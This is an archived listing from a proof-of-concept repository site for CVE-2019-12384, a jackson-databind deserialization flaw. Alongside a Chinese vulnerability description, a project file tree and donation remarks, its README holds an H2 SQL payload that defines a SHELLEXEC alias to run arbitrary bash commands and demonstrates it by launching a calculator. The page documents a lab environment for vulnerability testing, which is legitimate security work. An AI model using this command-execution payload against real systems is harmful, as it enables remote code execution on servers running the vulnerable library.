CVE-2019-12384 PoC — FasterXML jackson-databind 代码问题漏洞

Source

https://github.com/MagicZer0/Jackson_RCE-CVE-2019-12384

Associated Vulnerability

Title:FasterXML jackson-databind 代码问题漏洞 (CVE-2019-12384)
Description:FasterXML jackson-databind是FasterXML公司的一个基于JAVA可以将XML和JSON等数据格式与JAVA对象进行转换的库。Jackson可以轻松的将Java对象转换成json对象和xml文档，同样也可以将json、xml转换成Java对象。 FasterXML jackson-databind 2.9.9.1之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行代码或造成其他危害。

Description

CVE-2019-12384 漏洞测试环境

Readme

# 环境搭建

将项目导入到idea，再配置好maven之后设置自动导入依赖库，然后在本地的web空目录写入如下文件，保存为exec.sql。并启动一个http server：

```
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"/bin/bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')
```

请注意修改代码中对应的部分，适配不同的操作系统环境。

# 运行结果

可以看到弹出计算器。

# 漏洞参考

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

https://www.anquanke.com/post/id/182695

File Snapshot


 [4.0K]  /data/pocs/a1dba518df9655b16c2f569bea8bc03314f20faa
├── [  81]  Jackson-newGadget.iml
├── [ 11K]  LICENSE
├── [1.7K]  pom.xml
├── [ 883]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [ 924]  Main.java

3 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!